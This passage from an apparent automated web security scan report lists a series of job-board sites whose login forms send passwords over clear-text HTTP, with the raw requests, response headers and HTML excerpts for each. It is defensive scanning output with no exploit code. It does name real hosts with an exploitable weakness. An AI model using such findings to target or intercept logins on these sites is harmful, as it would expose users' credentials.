Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106436

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.occupationaltherapycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.83. http://www.operationscrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.operationscrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.operationscrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.operationscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pb54cpbbhj2rk90gr90bf4h334; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.operationscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.84. http://www.parttimecrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.parttimecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.parttimecrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.parttimecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ij1mnbg5ljm83h4g6kns0vi4c5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110601

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.parttimecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.85. http://www.pharmaceuticalcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pharmaceuticalcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.pharmaceuticalcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.pharmaceuticalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kufoga5sm934qb7mfhn708np70; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119431

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.pharmaceuticalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.86. http://www.physicalsecuritycrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.physicalsecuritycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.physicalsecuritycrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.physicalsecuritycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gi8upuba219celoic2370527h4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106914

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.physicalsecuritycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.87. http://www.physicaltherapycrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.physicaltherapycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.physicaltherapycrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.physicaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:16 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=05qenp73ui9sja89hqooo6u8d1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116104

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.physicaltherapycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.88. http://www.planningcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.planningcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.planningcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.planningcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m7mcbdpiiljbvgpgqr9pv8mf76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108598

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.planningcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.89. http://www.postdoctoralfellowcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.postdoctoralfellowcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.postdoctoralfellowcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.postdoctoralfellowcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4oc28cbo738q50s3ji82u7eki6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102645

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.postdoctoralfellowcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.90. http://www.prcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.prcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.prcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.prcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:35 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=b4uv8543vsma7m3i4v2d0i48g1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:35 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120302

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.prcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.91. http://www.preferredresumes.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.preferredresumes.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.preferredresumes.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.preferredresumes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:29 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=tig2sucmmp7tj371vs9tftefe3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83027

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Resume Writing Services, Professional Resume Writing, Cover Letter Writing
...[SNIP]...
</script>

<form name="formlogin" action="/index.php" method="POST" onsubmit="return Login()">
<input type=hidden name="clslogin_hdnaction" id="clslogin_hdnaction" value="">
...[SNIP]...
<td align="right"><input type="Password" name="clslogin_password" size="25" class="inputbox" onfocus="focusval(this.value,'Password')" onblur="blurval('Password')" value="Password"></td>
...[SNIP]...

6.92. http://www.procurementcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.procurementcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.procurementcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.procurementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mr66qa0ivqt5goom135g89nlu2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101019

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.procurementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.93. http://www.productmanagercrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.productmanagercrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.productmanagercrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.productmanagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:48 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=l5s6qlvjn27hh7eesjabq2c214; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106086

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.productmanagercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.94. http://www.projectmanagementcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.projectmanagementcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.projectmanagementcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.projectmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=k77p330j68s603hksj5he5k7t6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119200

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.projectmanagementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
